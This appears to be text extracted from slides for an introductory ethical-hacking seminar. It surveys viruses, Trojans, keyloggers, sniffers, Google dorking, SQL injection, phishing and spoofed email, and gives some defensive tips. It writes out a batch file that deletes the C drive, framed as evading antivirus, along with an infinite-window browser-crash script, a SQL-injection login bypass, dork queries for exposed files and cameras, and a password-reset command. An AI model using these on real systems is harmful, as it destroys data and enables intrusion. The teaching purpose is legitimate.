INFORMATION SECURITY

How secure are

you?

Agenda

Networks Exposure to Security Threats

What is Information Security And Ethical Hacking
Two Major Aspects - Desktop & Internet Security
Live Demonstrations of Attacks

Networks Exposures To Threats

By the end of 2015, 95% of enterprises will be infected with

undetected, financially motivated, targeted threats that evaded their
traditional perimeter and host defenses- By Gartner, Top Ten Key
Predictions, 2012

security predictions

Two Major Aspects Of

Security

Desktop and internet

Make Dangerous Virus In A

Minute
We will create this virus using batch file programming. This virus will delete the C Drive
completely. The good thing about this virus is that it is not detected by antivirus.

1. Open Notepad and copy below code into it.

Open Notepad and copy below code into it

@Echo off
Del C:\ *.* |y

Cracking Login Password

The Passwords are stored in SAM file

Cracking Tools :
ERD Commander
PH Crack
and many more

SAM = Security

OR we can Change
the Password

C:\> net user username password

You need the admin rights !
But you can change Passwords of Other Admin Users !

Thats easy but admin rights

Virus &
Worms

Trojan
Horse
Keylogger

The three major threats to computer

Symptom
s

The system might start

hanging.
Softwares and
applications often starts
crashing
System may become
unpredictable.

A
N
D

Worms
These generally dont
perform any malicious
activity.

They reside in the

system and make
copies of itself

These eat up the

system resources

In some extreme cases

OS may also crash.

Today almost 87% of all viruses/worms

Lets
Code a
Virus !

Is it difficult ?

Trojan Horse
A Trojan is an infection that
steals information.
It then sends the information to a
specified location over the
internet.
It makes the computer prone to
hackers by making Backdoors.

Attacker

Trojan is a fatal

Victim

KEYLOGGER

They log all the keys that

you type.
This runs in the
background and is totally
invisible.
Trojans often have the
keyloggers with them and
they mail the log to their
masters.

Watch your key

Windows Registry
All initialization and
configuration information used
by windows are stored in the
registry.

Know how change in registries effects

Network Scanners
Network Scanners used to
find all the live systems
present in the network with
the Information about IP
Address, Port Number,
Services running on that
ports, Vulnerabilities, installed
applications etc.
Some Tools: Angry IP Scanner
GFI LAN Guard
Look At LAN

Finding live Hosts!

Sniffers
Sniffers used to Capture the
data packet from the network by
applying some Poisoning such as
ARP Poisoning.
Some Tools: Cain and abel
Ettercap

hmmmmmmmmmm

Cryptography
Art of Secret writing to convert plaintext(Readable format) into cipher text(NonReadable format) by using some algorithms with the help of a Key.

Encrypters!

Stagenography
Art of Secret writing to Hide one file behind the other file. Example a text message
can be bind behind the image or video file.

Hiding..

How Do I Protect My Data ?

Use Antiviruses with
Updated Signatures
Use Firewalls
Do not open
Untrusted
executables
Use Cryptography
Techniques

I will mess it up!

Lets move to internet

World Wide Web

Web Developers Nightmare

Remote System
Scanning

Google
Hacking

DNS Spoofing

SQL Injection
DOS Attack

Website Exploits

Google Cracking
Using Google
Google

is more than just a

Search Engine.
Special keywords can
perform better Searches.
<Google Commands>
site, intitle, filetype, allintitle, inurl

Google crawls the web

Database Cracking

Hmmmmmmmmmmm.

Advance Googling

Filetype:xls hry.nic.in

Password Cracking

Intitle:index .of

Camera Cracking

Inurl:indexframe.shtml axis

Backend SQL string

SQL attack

Select * from table where user= " & TextBox1.Text & AND pass= '" & TextBox2.Text & ;

' OR '1'='1

String after SQL Injection

Select * from table where user= OR 1=1 AND pass= OR 1=1 ;

We Know that is always True!

user=

OR

1=1 AND pass=

OR

1=1 ;

Lets see how a simple SQL

Lets see
how is
this
done!

Surfing Online
Browser
Hacking
Phishing

Fake Emails

Social Networking
Abuse

Dangers for Internet Users

Browser Cracking
Use scripts links to run in Browser.
These scripts change the behavior of Browser.
Example:
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300;
y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function
A(){for(i=0; i<DIL; i++){DIS=DI[ i ].style; DIS.position='absolute';
DIS.left=Math.sin (R*x1+i*x2+x3)*x4+x5;
DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0)

javascript:b=[]; a=document.images; for(wt=0; wt<a.length; wt++)

{a[wt].style.position='relative'; b[b.length]=a[wt]}; j=0; setInterval('j++;
for(wt=0; wt<b.length; wt++)
{b[wt].style.left=Math.sin((6.28/a.length)*wt+j/10)*10}; void(0)',1);
void(0);

Lets Do It.........

Blast Virus
<html>
<body>
<script language="javascript">
while(1)
{
w1=window.open();
w1.document.write("<center><font color=red size=5>
blaaaast!!</font></center>");
}
</script>
</body>
</html>

Lets Do It.........

Fake Emails
Sending Fake mails with Fake
headers
E-mails can be sent to anyone
from any Id
It is used also in Spamming

Lets Send a Fake

Email !

Its bush@georgebush.com

How to Catch Fake Emailers

Analyze the headers
Use sites like
whatismyipaddress.com to
trace the IP address of fake mail

Go to Regional Internet
Registries like Apnic, Afrinic,
etc.
Get the email of ISP of attacker &
lodge the complaint.

Catch me if u can

Phishing Attack
E-mail: Theres a problem with
your Gmail account
Password

sent

Password?

User thinks its Gmail.com

(But its

Gmail.org)

Lets make a fake page

Preventing Phishing

Read the URL carefully

Keep a suspicious eye over

info demanding E-mails.

Anti-phishing Tools can

be effective

Use your Brain

Thank You
For any query and assistance,
Kindly contact:
Appin Technology lab

This is just a Trailer movie is about